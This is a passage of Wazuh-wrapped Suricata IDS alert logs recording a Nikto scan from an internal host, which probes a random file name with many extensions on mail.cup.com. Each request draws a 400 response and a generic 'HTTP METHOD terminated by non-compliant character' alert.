(Test:map_codes)\",\"http_content_type\":\"text/html\",\"http_method\":\"GET\",\"protocol\":\"HTTP/1.1\",\"status\":400,\"length\":226}}","decoder":{"name":"json"},"data":{"timestamp":"2020-03-04T19:18:34.439682+0000","flow_id":"1495318617829748.000000","in_iface":"eth0","event_type":"alert","src_ip":"192.168.10.238","src_port":"47006","dest_ip":"192.168.10.154","dest_port":"80","proto":"TCP","tx_id":"0","alert":{"action":"allowed","gid":"1","signature_id":"2221030","rev":"1","signature":"SURICATA HTTP METHOD terminated by non-compliant character","category":"Generic Protocol Command Decode","severity":"3"},"http":{"hostname":"mail.cup.com","url":"/bISn4adA.INC","http_user_agent":"Mozilla/5.00 (Nikto/2.1.5) (Evasions:6) (Test:map_codes)","http_content_type":"text/html","http_method":"GET","protocol":"HTTP/1.1","status":"400","length":"226"}},"location":"/var/log/forensic/suricata/eve.json"} {"timestamp":"2020-03-04T19:18:34.445037+0000","rule":{"level":3,"description":"Suricata: Alert - SURICATA HTTP METHOD terminated by non-compliant character","id":"86601","firedtimes":36,"mail":false,"groups":["ids","suricata"]},"agent":{"id":"000","name":"user-0"},"manager":{"name":"user-0"},"id":"1587995587.59917","full_log":"{\"timestamp\":\"2020-03-04T19:18:34.445037+0000\",\"flow_id\":429677102155680,\"in_iface\":\"eth0\",\"event_type\":\"alert\",\"src_ip\":\"192.168.10.238\",\"src_port\":47008,\"dest_ip\":\"192.168.10.154\",\"dest_port\":80,\"proto\":\"TCP\",\"tx_id\":0,\"alert\":{\"action\":\"allowed\",\"gid\":1,\"signature_id\":2221030,\"rev\":1,\"signature\":\"SURICATA HTTP METHOD terminated by non-compliant character\",\"category\":\"Generic Protocol Command Decode\",\"severity\":3},\"http\":{\"hostname\":\"mail.cup.com\",\"url\":\"/bISn4adA.jsp\",\"http_user_agent\":\"Mozilla/5.00 (Nikto/2.1.5) (Evasions:6) (Test:map_codes)\",\"http_content_type\":\"text/html\",\"http_method\":\"GET\",\"protocol\":\"HTTP/1.1\",\"status\":400,\"length\":226}}","decoder":{"name":"json"},"data":{"timestamp":"2020-03-04T19:18:34.445037+0000","flow_id":"429677102155680.000000","in_iface":"eth0","event_type":"alert","src_ip":"192.168.10.238","src_port":"47008","dest_ip":"192.168.10.154","dest_port":"80","proto":"TCP","tx_id":"0","alert":{"action":"allowed","gid":"1","signature_id":"2221030","rev":"1","signature":"SURICATA HTTP METHOD terminated by non-compliant character","category":"Generic Protocol Command Decode","severity":"3"},"http":{"hostname":"mail.cup.com","url":"/bISn4adA.jsp","http_user_agent":"Mozilla/5.00 (Nikto/2.1.5) (Evasions:6) (Test:map_codes)","http_content_type":"text/html","http_method":"GET","protocol":"HTTP/1.1","status":"400","length":"226"}},"location":"/var/log/forensic/suricata/eve.json"} {"timestamp":"2020-03-04T19:18:34.449313+0000","rule":{"level":3,"description":"Suricata: Alert - SURICATA HTTP METHOD terminated by non-compliant character","id":"86601","firedtimes":37,"mail":false,"groups":["ids","suricata"]},"agent":{"id":"000","name":"user-0"},"manager":{"name":"user-0"},"id":"1587995587.61453","full_log":"{\"timestamp\":\"2020-03-04T19:18:34.449313+0000\",\"flow_id\":324562072555718,\"in_iface\":\"eth0\",\"event_type\":\"alert\",\"src_ip\":\"192.168.10.238\",\"src_port\":47010,\"dest_ip\":\"192.168.10.154\",\"dest_port\":80,\"proto\":\"TCP\",\"tx_id\":0,\"alert\":{\"action\":\"allowed\",\"gid\":1,\"signature_id\":2221030,\"rev\":1,\"signature\":\"SURICATA HTTP METHOD terminated by non-compliant character\",\"category\":\"Generic Protocol Command Decode\",\"severity\":3},\"http\":{\"hostname\":\"mail.cup.com\",\"url\":\"/bISn4adA.htaccess\",\"http_user_agent\":\"Mozilla/5.00 (Nikto/2.1.5) (Evasions:6) (Test:map_codes)\",\"http_content_type\":\"text/html\",\"http_method\":\"GET\",\"protocol\":\"HTTP/1.1\",\"status\":400,\"length\":226}}","decoder":{"name":"json"},"data":{"timestamp":"2020-03-04T19:18:34.449313+0000","flow_id":"324562072555718.000000","in_iface":"eth0","event_type":"alert","src_ip":"192.168.10.238","src_port":"47010","dest_ip":"192.168.10.154","dest_port":"80","proto":"TCP","tx_id":"0","alert":{"action":"allowed","gid":"1","signature_id":"2221030","rev":"1","signature":"SURICATA HTTP METHOD terminated by non-compliant character","category":"Generic Protocol Command Decode","severity":"3"},"http":{"hostname":"mail.cup.com","url":"/bISn4adA.htaccess","http_user_agent":"Mozilla/5.00 (Nikto/2.1.5) (Evasions:6) (Test:map_codes)","http_content_type":"text/html","http_method":"GET","protocol":"HTTP/1.1","status":"400","length":"226"}},"location":"/var/log/forensic/suricata/eve.json"} {"timestamp":"2020-03-04T19:18:34.452773+0000","rule":{"level":3,"description":"Suricata: Alert - SURICATA HTTP METHOD terminated by non-compliant character","id":"86601","firedtimes":38,"mail":false,"groups":["ids","suricata"]},"agent":{"id":"000","name":"user-0"},"manager":{"name":"user-0"},"id":"1587995587.62999","full_log":"{\"timestamp\":\"2020-03-04T19:18:34.452773+0000\",\"flow_id\":1849172383425421,\"in_iface\":\"eth0\",\"event_type\":\"alert\",\"src_ip\":\"192.168.10.238\",\"src_port\":47012,\"dest_ip\":\"192.168.10.154\",\"dest_port\":80,\"proto\":\"TCP\",\"tx_id\":0,\"alert\":{\"action\":\"allowed\",\"gid\":1,\"signature_id\":2221030,\"rev\":1,\"signature\":\"SURICATA HTTP METHOD terminated by non-compliant character\",\"category\":\"Generic Protocol Command Decode\",\"severity\":3},\"http\":{\"hostname\":\"mail.cup.com\",\"url\":\"/bISn4adA.notes\",\"http_user_agent\":\"Mozilla/5.00 (Nikto/2.1.5) (Evasions:6) (Test:map_codes)\",\"http_content_type\":\"text/html\",\"http_method\":\"GET\",\"protocol\":\"HTTP/1.1\",\"status\":400,\"length\":226}}","decoder":{"name":"json"},"data":{"timestamp":"2020-03-04T19:18:34.452773+0000","flow_id":"1849172383425421.000000","in_iface":"eth0","event_type":"alert","src_ip":"192.168.10.238","src_port":"47012","dest_ip":"192.168.10.154","dest_port":"80","proto":"TCP","tx_id":"0","alert":{"action":"allowed","gid":"1","signature_id":"2221030","rev":"1","signature":"SURICATA HTTP METHOD terminated by non-compliant character","category":"Generic Protocol Command Decode","severity":"3"},"http":{"hostname":"mail.cup.com","url":"/bISn4adA.notes","http_user_agent":"Mozilla/5.00 (Nikto/2.1.5) (Evasions:6) (Test:map_codes)","http_content_type":"text/html","http_method":"GET","protocol":"HTTP/1.1","status":"400","length":"226"}},"location":"/var/log/forensic/suricata/eve.json"} {"timestamp":"2020-03-04T19:18:34.455975+0000","rule":{"level":3,"description":"Suricata: Alert - SURICATA HTTP METHOD terminated by non-compliant character","id":"86601","firedtimes":39,"mail":false,"groups":["ids","suricata"]},"agent":{"id":"000","name":"user-0"},"manager":{"name":"user-0"},"id":"1587995587.64541","full_log":"{\"timestamp\":\"2020-03-04T19:18:34.455975+0000\",\"flow_id\":2160789440622614,\"in_iface\":\"eth0\",\"event_type\":\"alert\",\"src_ip\":\"192.168.10.238\",\"src_port\":47014,\"dest_ip\":\"192.168.10.154\",\"dest_port\":80,\"proto\":\"TCP\",\"tx_id\":0,\"alert\":{\"action\":\"allowed\",\"gid\":1,\"signature_id\":2221030,\"rev\":1,\"signature\":\"SURICATA HTTP METHOD terminated by non-compliant character\",\"category\":\"Generic Protocol Command Decode\",\"severity\":3},\"http\":{\"hostname\":\"mail.cup.com\",\"url\":\"/bISn4adA.\",\"http_user_agent\":\"Mozilla/5.00 (Nikto/2.1.5) (Evasions:6) (Test:map_codes)\",\"http_content_type\":\"text/html\",\"http_method\":\"GET\",\"protocol\":\"HTTP/1.1\",\"status\":400,\"length\":226}}","decoder":{"name":"json"},"data":{"timestamp":"2020-03-04T19:18:34.455975+0000","flow_id":"2160789440622614.000000","in_iface":"eth0","event_type":"alert","src_ip":"192.168.10.238","src_port":"47014","dest_ip":"192.168.10.154","dest_port":"80","proto":"TCP","tx_id":"0","alert":{"action":"allowed","gid":"1","signature_id":"2221030","rev":"1","signature":"SURICATA HTTP METHOD terminated by non-compliant character","category":"Generic Protocol Command Decode","severity":"3"},"http":{"hostname":"mail.cup.com","url":"/bISn4adA.","http_user_agent":"Mozilla/5.00 (Nikto/2.1.5) (Evasions:6) (Test:map_codes)","http_content_type":"text/html","http_method":"GET","protocol":"HTTP/1.1","status":"400","length":"226"}},"location":"/var/log/forensic/suricata/eve.json"} {"timestamp":"2020-03-04T19:18:34.459533+0000","rule":{"level":3,"description":"Suricata: Alert - SURICATA HTTP METHOD terminated by non-compliant character","id":"86601","firedtimes":40,"mail":false,"groups":["ids","suricata"]},"agent":{"id":"000","name":"user-0"},"manager":{"name":"user-0"},"id":"1587995587.66073","full_log":"{\"timestamp\":\"2020-03-04T19:18:34.459533+0000\",\"flow_id\":124820323499370,\"in_iface\":\"eth0\",\"event_type\":\"alert\",\"src_ip\":\"192.168.10.238\",\"src_port\":47016,\"dest_ip\":\"192.168.10.154\",\"dest_port\":80,\"proto\":\"TCP\",\"tx_id\":0,\"alert\":{\"action\":\"allowed\",\"gid\":1,\"signature_id\":2221030,\"rev\":1,\"signature\":\"SURICATA HTTP METHOD terminated by non-compliant character\",\"category\":\"Generic Protocol Command Decode\",\"severity\":3},\"http\":{\"hostname\":\"mail.cup.com\",\"url\":\"/bISn4adA.snp\",\"http_user_agent\":\"Mozilla/5.00 (Nikto/2.1.5) (Evasions:6) (Test:map_codes)\",\"http_content_type\":\"text/html\",\"http_method\":\"GET\",\"protocol\":\"HTTP/1.1\",\"status\":400,\"length\":226}}","decoder":{"name":"json"},"data":{"timestamp":"2020-03-04T19:18:34.459533+0000","flow_id":"124820323499370.000000","in_iface":"eth0","event_type":"alert","src_ip":"192.168.10.238","src_port":"47016","dest_ip":"192.168.10.154","dest_port":"80","proto":"TCP","tx_id":"0","alert":{"action":"allowed","gid":"1","signature_id":"2221030","rev":"1","signature":"SURICATA HTTP METHOD terminated by non-compliant character","category":"Generic Protocol Command Decode","severity":"3"},"http":{"hostname":"mail.cup.com","url":"/bISn4adA.snp","http_user_agent":"Mozilla/5.00 (Nikto/2.1.5) (Evasions:6) (Test:map_codes)","http_content_type":"text/html","http_method":"GET","protocol":"HTTP/1.1","status":"400","length":"226"}},"location":"/var/log/forensic/suricata/eve.json"} {"timestamp":"2020-03-04T19:18:34.462827+0000","rule":{"level":3,"description":"Suricata: Alert - SURICATA HTTP METHOD terminated by non-compliant character","id":"86601","firedtimes":41,"mail":false,"groups":["ids","suricata"]},"agent":{"id":"000","name":"user-0"},"manager":{"name":"user-0"},"id":"1587995587.67609","full_log":"{\"timestamp\":\"2020-03-04T19:18:34.462827+0000\",\"flow_id\":67126027750670,\"in_iface\":\"eth0\",\"event_type\":\"alert\",\"src_ip\":\"192.168.10.238\",\"src_port\":47018,\"dest_ip\":\"192.168.10.154\",\"dest_port\":80,\"proto\":\"TCP\",\"tx_id\":0,\"alert\":{\"action\":\"allowed\",\"gid\":1,\"signature_id\":2221030,\"rev\":1,\"signature\":\"SURICATA HTTP METHOD terminated by non-compliant character\",\"category\":\"Generic Protocol Command Decode\",\"severity\":3},\"http\":{\"hostname\":\"mail.cup.com\",\"url\":\"/bISn4adA.cfm\",\"http_user_agent\":\"Mozilla/5.00 (Nikto/2.1.5) (Evasions:6) (Test:map_codes)\",\"http_content_type\":\"text/html\",\"http_method\":\"GET\",\"protocol\":\"HTTP/1.1\",\"status\":400,\"length\":226}}","decoder":{"name":"json"},"data":{"timestamp":"2020-03-04T19:18:34.462827+0000","flow_id":"67126027750670.000000","in_iface":"eth0","event_type":"alert","src_ip":"192.168.10.238","src_port":"47018","dest_ip":"192.168.10.154","dest_port":"80","proto":"TCP","tx_id":"0","alert":{"action":"allowed","gid":"1","signature_id":"2221030","rev":"1","signature":"SURICATA HTTP METHOD terminated by non-compliant character","category":"Generic Protocol Command Decode","severity":"3"},"http":{"hostname":"mail.cup.com","url":"/bISn4adA.cfm","http_user_agent":"Mozilla/5.00 (Nikto/2.1.5) (Evasions:6) (Test:map_codes)","http_content_type":"text/html","http_method":"GET","protocol":"HTTP/1.1","status":"400","length":"226"}},"location":"/var/log/forensic/suricata/eve.json"} {"timestamp":"2020-03-04T19:18:34.465956+0000","rule":{"level":3,"description":"Suricata: Alert - SURICATA HTTP METHOD terminated by non-compliant character","id":"86601","firedtimes":42,"mail":false,"groups":["ids","suricata"]},"agent":{"id":"000","name":"user-0"},"manager":{"name":"user-0"},"id":"1587995587.69143","full_log":"{\"timestamp\":\"2020-03-04T19:18:34.465956+0000\",\"flow_id\":1588798580987989,\"in_iface\":\"eth0\",\"event_type\":\"alert\",\"src_ip\":\"192.168.10.238\",\"src_port\":47020,\"dest_ip\":\"192.168.10.154\",\"dest_port\":80,\"proto\":\"TCP\",\"tx_id\":0,\"alert\":{\"action\":\"allowed\",\"gid\":1,\"signature_id\":2221030,\"rev\":1,\"signature\":\"SURICATA HTTP METHOD terminated by non-compliant character\",\"category\":\"Generic Protocol Command Decode\",\"severity\":3},\"http\":{\"hostname\":\"mail.cup.com\",\"url\":\"/bISn4adA.zip\",\"http_user_agent\":\"Mozilla/5.00 (Nikto/2.1.5) (Evasions:6) (Test:map_codes)\",\"http_content_type\":\"text/html\",\"http_method\":\"GET\",\"protocol\":\"HTTP/1.1\",\"status\":400,\"length\":226}}","decoder":{"name":"json"},"data":{"timestamp":"2020-03-04T19:18:34.465956+0000","flow_id":"1588798580987989.000000","in_iface":"eth0","event_type":"alert","src_ip":"192.168.10.238","src_port":"47020","dest_ip":"192.168.10.154","dest_port":"80","proto":"TCP","tx_id":"0","alert":{"action":"allowed","gid":"1","signature_id":"2221030","rev":"1","signature":"SURICATA HTTP METHOD terminated by non-compliant character","category":"Generic Protocol Command Decode","severity":"3"},"http":{"hostname":"mail.cup.com","url":"/bISn4adA.zip","http_user_agent":"Mozilla/5.00 (Nikto/2.1.5) (Evasions:6) (Test:map_codes)","http_content_type":"text/html","http_method":"GET","protocol":"HTTP/1.1","status":"400","length":"226"}},"location":"/var/log/forensic/suricata/eve.json"} {"timestamp":"2020-03-04T19:18:34.468908+0000","rule":{"level":3,"description":"Suricata: Alert - SURICATA HTTP METHOD terminated by non-compliant character","id":"86601","firedtimes":43,"mail":false,"groups":["ids","suricata"]},"agent":{"id":"000","name":"user-0"},"manager":{"name":"user-0"},"id":"1587995587.70681","full_log":"{\"timestamp\":\"2020-03-04T19:18:34.468908+0000\",\"flow_id\":1790687813706853,\"in_iface\":\"eth0\",\"event_type\":\"alert\",\"src_ip\":\"192.168.10.238\",\"src_port\":47022,\"dest_ip\":\"192.168.10.154\",\"dest_port\":80,\"proto\":\"TCP\",\"tx_id\":0,\"alert\":{\"action\":\"allowed\",\"gid\":1,\"signature_id\":2221030,\"rev\":1,\"signature\":\"SURICATA HTTP METHOD terminated by non-compliant character\",\"category\":\"Generic Protocol Command Decode\",\"severity\":3},\"http\":{\"hostname\":\"mail.cup.com\",\"url\":\"/bISn4adA.txt\",\"http_user_agent\":\"Mozilla/5.00 (Nikto/2.1.5) (Evasions:6) (Test:map_codes)\",\"http_content_type\":\"text/html\",\"http_method\":\"GET\",\"protocol\":\"HTTP/1.1\",\"status\":400,\"length\":226}}","decoder":{"name":"json"},"data":{"timestamp":"2020-03-04T19:18:34.468908+0000","flow_id":"1790687813706853.000000","in_iface":"eth0","event_type":"alert","src_ip":"192.168.10.238","src_port":"47022","dest_ip":"192.168.10.154","dest_port":"80","proto":"TCP","tx_id":"0","alert":{"action":"allowed","gid":"1","signature_id":"2221030","rev":"1","signature":"SURICATA HTTP METHOD terminated by non-compliant character","category":"Generic Protocol Command Decode","severity":"3"},"http":{"hostname":"mail.cup.com","url":"/bISn4adA.txt","http_user_agent":"Mozilla/5.00 (Nikto/2.1.5) (Evasions:6) (Test:map_codes)","http_content_type":"text/html","http_method":"GET","protocol":"HTTP/1.1","status":"400","length":"226"}},"location":"/var/log/forensic/suricata/eve.json"} {"timestamp":"2020-03-04T19:18:34.471834+0000","rule":{"level":3,"description":"Suricata: Alert - SURICATA HTTP METHOD terminated by non-compliant character","id":"86601","firedtimes":44,"mail":false,"groups":["ids","suricata"]},"agent":{"id":"000","name":"user-0"},"manager":{"name":"user-0"},"id":"1587995587.72219","full_log":"{\"timestamp\":\"2020-03-04T19:18:34.471834+0000\",\"flow_id\":1467865186840382,\"in_iface\":\"eth0\",\"event_type\":\"alert\",\"src_ip\":\"192.168.10.238\",\"src_port\":47024,\"dest_ip\":\"192.168.10.154\",\"dest_port\":80,\"proto\":\"TCP\",\"tx_id\":0,\"alert\":{\"action\":\"allowed\",\"gid\":1,\"signature_id\":2221030,\"rev\":1,\"signature\":\"SURICATA HTTP METHOD terminated by non-compliant character\",\"category\":\"Generic Protocol Command Decode\",\"severity\":3},\"http\":{\"hostname\":\"mail.cup.com\",\"url\":\"/bISn4adA.js0x70\",\"http_user_agent\":\"Mozilla/5.00 (Nikto/2.1.5) (Evasions:6) (Test:map_codes)\",\"http_content_type\":\"text/html\",\"http_method\":\"GET\",\"protocol\":\"HTTP/1.1\",\"status\":400,\"length\":226}}","decoder":{"name":"json"},"data":{"timestamp":"2020-03-04T19:18:34.471834+0000","flow_id":"1467865186840382.000000","in_iface":"eth0","event_type":"alert","src_ip":"192.168.10.238","src_port":"47024","dest_ip":"192.168.10.154","dest_port":"80","proto":"TCP","tx_id":"0","alert":{"action":"allowed","gid":"1","signature_id":"2221030","rev":"1","signature":"SURICATA HTTP METHOD terminated by non-compliant character","category":"Generic Protocol Command Decode","severity":"3"},"http":{"hostname":"mail.cup.com","url":"/bISn4adA.js0x70","http_user_agent":"Mozilla/5.00 (Nikto/2.1.5) (Evasions:6) (Test:map_codes)","http_content_type":"text/html","http_method":"GET","protocol":"HTTP/1.1","status":"400","length":"226"}},"location":"/var/log/forensic/suricata/eve.json"} {"timestamp":"2020-03-04T19:18:34.479014+0000","rule":{"level":3,"description":"Suricata: Alert - SURICATA HTTP METHOD terminated by non-compliant character","id":"86601","firedtimes":45,"mail":false,"groups":["ids","suricata"]},"agent":{"id":"000","name":"user-0"},"manager":{"name":"user-0"},"id":"1587995587.73763","full_log":"{\"timestamp\":\"2020-03-04T19:18:34.479014+0000\",\"flow_id\":1815388170634565,\"in_iface\":\"eth0\",\"event_type\":\"alert\",\"src_ip\":\"192.168.10.238\",\"src_port\":47026,\"dest_ip\":\"192.168.10.154\",\"dest_port\":80,\"proto\":\"TCP\",\"tx_id\":0,\"alert\":{\"action\":\"allowed\",\"gid\":1,\"signature_id\":2221030,\"rev\":1,\"signature\":\"SURICATA HTTP METHOD terminated by non-compliant character\",\"category\":\"Generic Protocol Command Decode\",\"severity\":3},\"http\":{\"hostname\":\"mail.cup.com\",\"url\":\"/bISn4adA.bas\",\"http_user_agent\":\"Mozilla/5.00 (Nikto/2.1.5) (Evasions:6) (Test:map_codes)\",\"http_content_type\":\"text/html\",\"http_method\":\"GET\",\"protocol\":\"HTTP/1.1\",\"status\":400,\"length\":226}}","decoder":{"name":"json"},"data":{"timestamp":"2020-03-04T19:18:34.479014+0000","flow_id":"1815388170634565.000000","in_iface":"eth0","event_type":"alert","src_ip":"192.168.10.238","src_port":"47026","dest_ip":"192.168.10.154","dest_port":"80","proto":"TCP","tx_id":"0","alert":{"action":"allowed","gid":"1","signature_id":"2221030","rev":"1","signature":"SURICATA HTTP METHOD terminated by non-compliant character","category":"Generic Protocol Command Decode","severity":"3"},"http":{"hostname":"mail.cup.com","url":"/bISn4adA.bas","http_user_agent":"Mozilla/5.00 (Nikto/2.1.5) (Evasions:6) (Test:map_codes)","http_content_type":"text/html","http_method":"GET","protocol":"HTTP/1.1","status":"400","length":"226"}},"location":"/var/log/forensic/suricata/eve.json"} {"timestamp":"2020-03-04T19:18:34.482231+0000","rule":{"level":3,"description":"Suricata: Alert - SURICATA HTTP METHOD terminated by non-compliant character","id":"86601","firedtimes":46,"mail":false,"groups":["ids","suricata"]},"agent":{"id":"000","name":"user-0"},"manager":{"name":"user-0"},"id":"1587995587.75301","full_log":"{\"timestamp\":\"2020-03-04T19:18:34.482231+0000\",\"flow_id\":2.02973710348082e+15,\"in_iface\":\"eth0\",\"event_type\":\"alert\",\"src_ip\":\"192.168.10.238\",\"src_port\":47028,\"dest_ip\":\"192.168.10.154\",\"dest_port\":80,\"proto\":\"TCP\",\"tx_id\":0,\"alert\":{\"action\":\"allowed\",\"gid\":1,\"signature_id\":2221030,\"rev\":1,\"signature\":\"SURICATA HTTP METHOD terminated by non-compliant character\",\"category\":\"Generic Protocol Command Decode\",\"severity\":3},\"http\":{\"hostname\":\"mail.cup.com\",\"url\":\"/bISn4adA.LCDispatcher\",\"http_user_agent\":\"Mozilla/5.00 (Nikto/2.1.5) (Evasions:6) (Test:map_codes)\",\"http_content_type\":\"text/html\",\"http_method\":\"GET\",\"protocol\":\"HTTP/1.1\",\"status\":400,\"length\":226}}","decoder":{"name":"json"},"data":{"timestamp":"2020-03-04T19:18:34.482231+0000","flow_id":"2029737103480820.000000","in_iface":"eth0","event_type":"alert","src_ip":"192.168.10.238","src_port":"47028","dest_ip":"192.168.10.154","dest_port":"80","proto":"TCP","tx_id":"0","alert":{"action":"allowed","gid":"1","signature_id":"2221030","rev":"1","signature":"SURICATA HTTP METHOD terminated by non-compliant character","category":"Generic Protocol Command Decode","severity":"3"},"http":{"hostname":"mail.cup.com","url":"/bISn4adA.LCDispatcher","http_user_agent":"Mozilla/5.00 (Nikto/2.1.5) (Evasions:6) (Test:map_codes)","http_content_type":"text/html","http_method":"GET","protocol":"HTTP/1.1","status":"400","length":"226"}},"location":"/var/log/forensic/suricata/eve.json"} {"timestamp":"2020-03-04T19:18:34.484832+0000","rule":{"level":3,"description":"Suricata: Alert - SURICATA HTTP METHOD terminated by non-compliant character","id":"86601","firedtimes":47,"mail":false,"groups":["ids","suricata"]},"agent":{"id":"000","name":"user-0"},"manager":{"name":"user-0"},"id":"1587995587.76861","full_log":"{\"timestamp\":\"2020-03-04T19:18:34.484832+0000\",\"flow_id\":1487763770335653,\"in_iface\":\"eth0\",\"event_type\":\"alert\",\"src_ip\":\"192.168.10.238\",\"src_port\":47030,\"dest_ip\":\"192.168.10.154\",\"dest_port\":80,\"proto\":\"TCP\",\"tx_id\":0,\"alert\":{\"action\":\"allowed\",\"gid\":1,\"signature_id\":2221030,\"rev\":1,\"signature\":\"SURICATA HTTP METHOD terminated by non-compliant character\",\"category\":\"Generic Protocol Command Decode\",\"severity\":3},\"http\":{\"hostname\":\"mail.cup.com\",\"url\":\"/bISn4adA.xml\",\"http_user_agent\":\"Mozilla/5.00 (Nikto/2.1.5) (Evasions:6) (Test:map_codes)\",\"http_content_type\":\"text/html\",\"http_method\":\"GET\",\"protocol\":\"HTTP/1.1\",\"status\":400,\"length\":226}}","decoder":{"name":"json"},"data":{"timestamp":"2020-03-04T19:18:34.484832+0000","flow_id":"1487763770335653.000000","in_iface":"eth0","event_type":"alert","src_ip":"192.168.10.238","src_port":"47030","dest_ip":"192.168.10.154","dest_port":"80","proto":"TCP","tx_id":"0","alert":{"action":"allowed","gid":"1","signature_id":"2221030","rev":"1","signature":"SURICATA HTTP METHOD terminated by non-compliant character","category":"Generic Protocol Command Decode","severity":"3"},"http":{"hostname":"mail.cup.com","url":"/bISn4adA.xml","http_user_agent":"Mozilla/5.00 (Nikto/2.1.5) (Evasions:6) (Test:map_codes)","http_content_type":"text/html","http_method":"GET","protocol":"HTTP/1.1","status":"400","length":"226"}},"location":"/var/log/forensic/suricata/eve.json"} {"timestamp":"2020-03-04T19:18:34.490695+0000","rule":{"level":3,"description":"Suricata: Alert - SURICATA HTTP METHOD terminated by non-compliant character","id":"86601","firedtimes":48,"mail":false,"groups":["ids","suricata"]},"agent":{"id":"000","name":"user-0"},"manager":{"name":"user-0"},"id":"1587995587.78399","full_log":"{\"timestamp\":\"2020-03-04T19:18:34.490695+0000\",\"flow_id\":2040551831140588,\"in_iface\":\"eth0\",\"event_type\":\"alert\",\"src_ip\":\"192.168.10.238\",\"src_port\":47032,\"dest_ip\":\"192.168.10.154\",\"dest_port\":80,\"proto\":\"TCP\",\"tx_id\":0,\"alert\":{\"action\":\"allowed\",\"gid\":1,\"signature_id\":2221030,\"rev\":1,\"signature\":\"SURICATA HTTP METHOD terminated by non-compliant character\",\"category\":\"Generic Protocol Command Decode\",\"severity\":3},\"http\":{\"hostname\":\"mail.cup.com\",\"url\":\"/bISn4adA.gz\",\"http_user_agent\":\"Mozilla/5.00 (Nikto/2.1.5) (Evasions:6) (Test:map_codes)\",\"http_content_type\":\"text/html\",\"http_method\":\"GET\",\"protocol\":\"HTTP/1.1\",\"status\":400,\"length\":226}}","decoder":{"name":"json"},"data":{"timestamp":"2020-03-04T19:18:34.490695+0000","flow_id":"2040551831140588.000000","in_iface":"eth0","event_type":"alert","src_ip":"192.168.10.238","src_port":"47032","dest_ip":"192.168.10.154","dest_port":"80","proto":"TCP","tx_id":"0","alert":{"action":"allowed","gid":"1","signature_id":"2221030","rev":"1","signature":"SURICATA HTTP METHOD terminated by non-compliant character","category":"Generic Protocol Command Decode","severity":"3"},"http":{"hostname":"mail.cup.com","url":"/bISn4adA.gz","http_user_agent":"Mozilla/5.00 (Nikto/2.1.5) (Evasions:6) (Test:map_codes)","http_content_type":"text/html","http_method":"GET","protocol":"HTTP/1.1","status":"400","length":"226"}},"location":"/var/log/forensic/suricata/eve.json"} {"timestamp":"2020-03-04T19:18:34.497254+0000","rule":{"level":3,"description":"Suricata: Alert - SURICATA HTTP METHOD terminated by non-compliant character","id":"86601","firedtimes":49,"mail":false,"groups":["ids","suricata"]},"agent":{"id":"000","name":"user-0"},"manager":{"name":"user-0"},"id":"1587995587.79935","full_log":"{\"timestamp\":\"2020-03-04T19:18:34.497254+0000\",\"flow_id\":119434434482673,\"in_iface\":\"eth0\",\"event_type\":\"alert\",\"src_ip\":\"192.168.10.238\",\"src_port\":47034,\"dest_ip\":\"192.168.10.154\",\"dest_port\":80,\"proto\":\"TCP\",\"tx_id\":0,\"alert\":{\"action\":\"allowed\",\"gid\":1,\"signature_id\":2221030,\"rev\":1,\"signature\":\"SURICATA HTTP METHOD terminated by non-compliant character\",\"category\":\"Generic Protocol Command Decode\",\"severity\":3},\"http\":{\"hostname\":\"mail.cup.com\",\"url\":\"/bISn4adA.xtp\",\"http_user_agent\":\"Mozilla/5.00 (Nikto/2.1.5) (Evasions:6) (Test:map_codes)\",\"http_content_type\":\"text/html\",\"http_method\":\"GET\",\"protocol\":\"HTTP/1.1\",\"status\":400,\"length\":226}}","decoder":{"name":"json"},"data":{"timestamp":"2020-03-04T19:18:34.497254+0000","flow_id":"119434434482673.000000","in_iface":"eth0","event_type":"alert","src_ip":"192.168.10.238","src_port":"47034","dest_ip":"192.168.10.154","dest_port":"80","proto":"TCP","tx_id":"0","alert":{"action":"allowed","gid":"1","signature_id":"2221030","rev":"1","signature":"SURICATA HTTP METHOD terminated by non-compliant character","category":"Generic Protocol Command Decode","severity":"3"},"http":{"hostname":"mail.cup.com","url":"/bISn4adA.xtp","http_user_agent":"Mozilla/5.00 (Nikto/2.1.5) (Evasions:6) (Test:map_codes)","http_content_type":"text/html","http_method":"GET","protocol":"HTTP/1.1","status":"400","length":"226"}},"location":"/var/log/forensic/suricata/eve.json"} {"timestamp":"2020-03-04T19:18:34.500145+0000","rule":{"level":3,"description":"Suricata: Alert - SURICATA HTTP METHOD terminated by non-compliant character","id":"86601","firedtimes":50,"mail":false,"groups":["ids","suricata"]},"agent":{"id":"000","name":"user-0"},"manager":{"name":"user-0"},"id":"1587995587.81471","full_log":"{\"timestamp\":\"2020-03-04T19:18:34.500145+0000\",\"flow_id\":833747625352614,\"in_iface\":\"eth0\",\"event_type\":\"alert\",\"src_ip\":\"192.168.10.238\",\"src_port\":47036,\"dest_ip\":\"192.168.10.154\",\"dest_port\":80,\"proto\":\"TCP\",\"tx_id\":0,\"alert\":{\"action\":\"allowed\",\"gid\":1,\"signature_id\":2221030,\"rev\":1,\"signature\":\"SURICATA HTTP METHOD terminated by non-compliant character\",\"category\":\"Generic Protocol Command Decode\",\"severity\":3},\"http\":{\"hostname\":\"mail.cup.com\",\"url\":\"/bISn4adA.iso2022-kr\",\"http_user_agent\":\"Mozilla/5.00 (Nikto/2.1.5) (Evasions:6) (Test:map_codes)\",\"http_content_type\":\"text/html\",\"http_method\":\"GET\",\"protocol\":\"HTTP/1.1\",\"status\":400,\"length\":226}}","decoder":{"name":"json"},"data":{"timestamp":"2020-03-04T19:18:34.500145+0000","flow_id":"833747625352614.000000","in_iface":"eth0","event_type":"alert","src_ip":"192.168.10.238","src_port":"47036","dest_ip":"192.168.10.154","dest_port":"80","proto":"TCP","tx_id":"0","alert":{"action":"allowed","gid":"1","signature_id":"2221030","rev":"1","signature":"SURICATA HTTP METHOD terminated by non-compliant character","category":"Generic Protocol Command Decode","severity":"3"},"http":{"hostname":"mail.cup.com","url":"/bISn4adA.iso2022-kr","http_user_agent":"Mozilla/5.00 (Nikto/2.1.5) (Evasions:6) (Test:map_codes)","http_content_type":"text/html","http_method":"GET","protocol":"HTTP/1.1","status":"400","length":"226"}},"location":"/var/log/forensic/suricata/eve.json"} {"timestamp":"2020-03-04T19:18:34.502204+0000","rule":{"level":3,"description":"Suricata: Alert - SURICATA HTTP METHOD terminated by non-compliant 